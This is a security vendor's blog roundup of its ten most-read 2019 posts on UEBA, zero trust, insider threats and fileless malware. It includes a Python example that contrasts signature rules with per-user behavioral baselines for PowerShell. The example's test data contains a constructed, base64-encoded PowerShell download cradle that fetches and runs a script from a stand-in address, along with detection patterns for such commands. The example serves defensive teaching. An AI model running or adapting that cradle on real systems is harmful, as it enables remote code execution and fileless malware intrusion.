How serious was cybercrime in 2019? According to research firm Risk Based Security, 2019 was the “worst year on record” for data breaches. And considering the massive breaches we saw in preceding years, that’s really saying something.
In late 2019, the firm issued a report announcing a 33% increase in data breaches over the previous year: 5,183 breaches exposing 7.9 billion records year to date. Those breaches stemmed from a range of attack types, including ransomware, business email compromise, malicious insiders and more.
If there was one theme to the cybersecurity landscape in 2019, it might be "the year of the unsecured database". Incident after incident traced back to data stores left reachable from the internet without authentication: Amazon AWS storage, Elasticsearch clusters and other databases. Some of the exposed data belonged to the companies that left it open; some was apparently data that had already been stolen and was being staged by someone else. Wyze was the most recent company to suffer such a fate. Cultera Collecteva was also a victim in 2019, as was Honda.
In 2019 our blog covered all manner of data breaches and cyberattacks. As always, some were more popular with readers than others. Here are our 10 most read Gurucul blog posts of the year as measured by pageviews.
10. Security Analytics is the New Approach to IoT Security
Internet connected devices are everywhere – TVs, speakers, refrigerators, watches, fire alarms, door locks, cameras, medical devices, fitness trackers and much more. IoT is driving genuinely transformational change in modern IT infrastructure. The unintended consequence is a vast, porous security perimeter: every new connected device is another endpoint to be compromised, and most of them cannot run an agent or be patched on a normal cadence. The IoT is largely "undefendable" with traditional, perimeter- and signature-based security architectures. In Security Analytics is the New Approach to IoT Security, we look at how organizations can get a handle on this growing threat by baselining what each device normally does and alerting on deviations.
9. The Role of Security Analytics in a Zero Trust Environment
The Zero Trust security model starts from the premise that an organization should not implicitly trust anything, whether it sits inside or outside the network perimeter. Instead, every user, device and workload attempting to connect to a system must be verified before access is granted, and that verification continues after the initial connection rather than ending at login. In The Role of Security Analytics in a Zero Trust Environment, we explore how Gurucul has aligned with the zero trust concept since long before the term was in vogue.
8. Why Signature Based Defense is No Longer Adequate
Signatures alone are no longer enough to stop today's advanced threats, which are built to evade exact-match detection. Indicators of compromise (IOCs) remain useful in forensic reviews and for mapping the course of an attack after the fact, but they only describe what has already been seen, so security leaders must think differently about defending their environments. The post Why Signature Based Defense is No Longer Adequate covers one of those different approaches – User and Entity Behavior Analytics (UEBA), which flags activity that departs from an established baseline rather than activity that matches a known pattern.
7. A Security Evolution: Taking Security Beyond SIEM with Gurucul Security Analytics
Traditional SIEMs import data, normalize it and provide minimal enrichment (adding context to each event). Correlation rules then specify a sequence of events that indicates an anomaly or potential security threat. This technique is dated for two reasons: rules written broadly enough to catch variations generate significant numbers of false positives, and rules can only describe attacks someone already knows about, so they are incapable of detecting new and especially unexpected threats. What if you had the technology to predict a breach before it happens? A Security Evolution: Taking Security Beyond SIEM answers that question.
6. What is Big Data?
Big Data is made up of structured, semi-structured and unstructured data sets. These data sets are difficult to process with traditional database and software techniques because of the 3 Vs of big data – volume, velocity and variety. The data is too big (volume), arrives too fast (velocity) or comes in too many formats and from too many sources to fit a single schema (variety). Read What is Big Data? to learn about Big Data analytics, Data Lakes, Data Warehouses, UEBA vendors offering open choice of big data back end, and more.
5. Stop Fileless Malware with Abnormal Powershell Command Execution
Fileless malware is malicious code that exists only in memory. Because it is never written to the target computer's disk as an executable, it eludes intrusion prevention systems and antivirus programs that rely on scanning files. User systems typically become infected by visiting malicious websites or opening weaponized documents. Rather than exploiting a flaw in PowerShell itself, fileless malware abuses PowerShell as a trusted, already-installed interpreter to pull down and run its payload in memory, frequently using encoded or hidden-window command lines to stay out of sight. Our post Stop Fileless Malware with Abnormal Powershell Command Execution looks at machine learning models that spot PowerShell activity that is abnormal for a given user or host and stop this type of dangerous attack.
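The contrast drawn in items 7 and 5 above, a static correlation rule versus a per-user behavioral baseline, is easier to see on concrete data. The script below is an added example written for this roundup; it is not Gurucul's product code and it does not claim to be the model the linked post describes. The process-creation log lines, the usernames, the host intranet.example and the address 203.0.113.7 are all constructed for illustration, and the feature list is a deliberately small hand-picked set of PowerShell traits. It decodes -EncodedCommand payloads the way PowerShell does (UTF-16LE, base64), then scores each new command line two ways: a toy signature rule matching the raw string, and a count of traits the user has never exhibited before.

```python
"""Added example (not Gurucul's code): signature match versus per-user behavioral
baseline for PowerShell command lines. All log events here are constructed."""
import base64
import re
from collections import Counter

# -EncodedCommand and its short forms, followed by a base64 blob to decode.
ENCODED = re.compile(r"-e(?:c|nc|ncodedcommand)?\s+([A-Za-z0-9+/=]{16,})", re.I)

# Hand-picked PowerShell traits worth watching (illustrative, not exhaustive).
FEATURES = {
    "encoded_command": ENCODED,
    "hidden_window": re.compile(r"-w(?:indowstyle)?\s+hidden", re.I),
    "exec_bypass": re.compile(r"-e(?:p|x|xec|xecutionpolicy)\s+bypass", re.I),
    "no_profile": re.compile(r"-nop(?:rofile)?\b", re.I),
    "download_cradle": re.compile(r"DownloadString|DownloadFile|Invoke-WebRequest|\biwr\b", re.I),
    "invoke_expression": re.compile(r"\b(?:iex|Invoke-Expression)\b", re.I),
}

# Toy IOC-style rule: an exact substring on the raw command line, as a SIEM rule might use.
SIGNATURE = re.compile(r"DownloadString\(", re.I)

ALERT_THRESHOLD = 2  # novel traits in one event before the behavioral model alerts


def expand(cmdline):
    """Return the command line plus any -EncodedCommand payload, decoded as PowerShell would."""
    text = cmdline
    for blob in ENCODED.findall(cmdline):
        try:
            text += " " + base64.b64decode(blob).decode("utf-16le")
        except (ValueError, UnicodeDecodeError):
            pass  # not a valid payload; score the raw line only
    return text


def extract_features(cmdline):
    """Set of trait names present in the raw or decoded command line."""
    text = expand(cmdline)
    return {name for name, rx in FEATURES.items() if rx.search(text)}


def signature_hit(cmdline):
    """Static rule: fires only when the literal pattern appears in the raw line."""
    return bool(SIGNATURE.search(cmdline))


class UserBaseline:
    """Per-user counts of traits seen in historical events."""

    def __init__(self):
        self.seen = {}

    def learn(self, user, cmdline):
        self.seen.setdefault(user, Counter()).update(extract_features(cmdline))


def score_event(baseline, user, cmdline):
    """Return (number of traits new for this user, sorted list of those traits)."""
    known = baseline.seen.get(user, Counter())
    novel = {f for f in extract_features(cmdline) if known[f] == 0}
    return len(novel), sorted(novel)


def encode_cmd(script):
    """Build an -EncodedCommand argument exactly as PowerShell expects it."""
    return base64.b64encode(script.encode("utf-16le")).decode("ascii")


# Constructed history: alice runs ops scripts, bob is an ordinary user.
HISTORY = [
    ("alice", r"powershell.exe -NoProfile -ExecutionPolicy Bypass -File C:\ops\backup.ps1"),
    ("alice", r"powershell.exe -NoProfile -ExecutionPolicy Bypass -File C:\ops\backup.ps1"),
    ("alice", "powershell.exe -nop (New-Object Net.WebClient).DownloadString('https://intranet.example/update.ps1') | iex"),
    ("bob", r"powershell.exe Get-ChildItem C:\Users\bob\Documents"),
    ("bob", "powershell.exe Get-Date"),
]

# Constructed new events: alice's routine updater, and an encoded download cradle under bob.
NEW_EVENTS = {
    "alice_routine": ("alice", "powershell.exe -nop -ep bypass (New-Object Net.WebClient).DownloadString('https://intranet.example/update.ps1') | iex"),
    "bob_encoded": ("bob", "powershell.exe -nop -w hidden -enc "
                    + encode_cmd("IEX (New-Object Net.WebClient).DownloadString('http://203.0.113.7/a.ps1')")),
}


def run_demo():
    """Score NEW_EVENTS against a baseline learned from HISTORY; return both verdicts per event."""
    baseline = UserBaseline()
    for user, cmd in HISTORY:
        baseline.learn(user, cmd)
    results = {}
    for label, (user, cmd) in NEW_EVENTS.items():
        novel, traits = score_event(baseline, user, cmd)
        results[label] = {
            "signature_hit": signature_hit(cmd),
            "novel_features": traits,
            "behavior_alert": novel >= ALERT_THRESHOLD,
        }
    return results


if __name__ == "__main__":
    for label, verdict in run_demo().items():
        print(label, verdict)
```

The signature rule fires on alice's routine updater (a false positive, since that command is normal for her) and misses bob's event entirely, because the DownloadString call is hidden inside the base64 blob. The baseline scorer gets both right: zero novel traits for alice, five for bob. In practice the trait list, the decoding of nested encodings and the threshold would all be far richer, but the shape of the argument is the same.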
4. A is for Analytics
The first post in our popular blog series ABCs of UEBA is about analytics, particularly security analytics. Read A is for Analytics to learn all about the process of transforming user and entity behavior data into risk-prioritized intelligence, for the purpose of driving business action.
3. What is Machine Learning?
Machine learning (ML) is the branch of artificial intelligence that lets systems learn from data and improve with experience without being explicitly programmed for each case – literally "letting the machine learn". What is Machine Learning? explores the background of machine learning, where it fits in the overall AI landscape, and how Gurucul uses it to detect and predict anomalous behavior that is indicative of a cybersecurity threat.
2. Insider Threat Survey Report: RSA 2019
At the 2019 RSA Conference, Gurucul conducted an Insider Threat Survey to get a sense of how prevalent the insider threat is in the minds of practitioners. 671 IT professionals from around the world responded. Our post Insider Threat Survey Report: RSA 2019 examines the key findings.
1. Famous Insider Threat Cases
Insider threats are among the most serious security risks an organization faces, because insiders already hold the access that an outside attacker has to work to obtain, and so can cause the most destruction. From abusing privileged access to walking out with company data, the biggest and worst threats to a company's security program are sometimes right under its nose. In our most read post of 2019 – Famous Insider Threat Cases – we look at some of the world's most destructive insider threat incidents and discuss how each could have been prevented.
Happy new year and thanks for reading the Gurucul blog.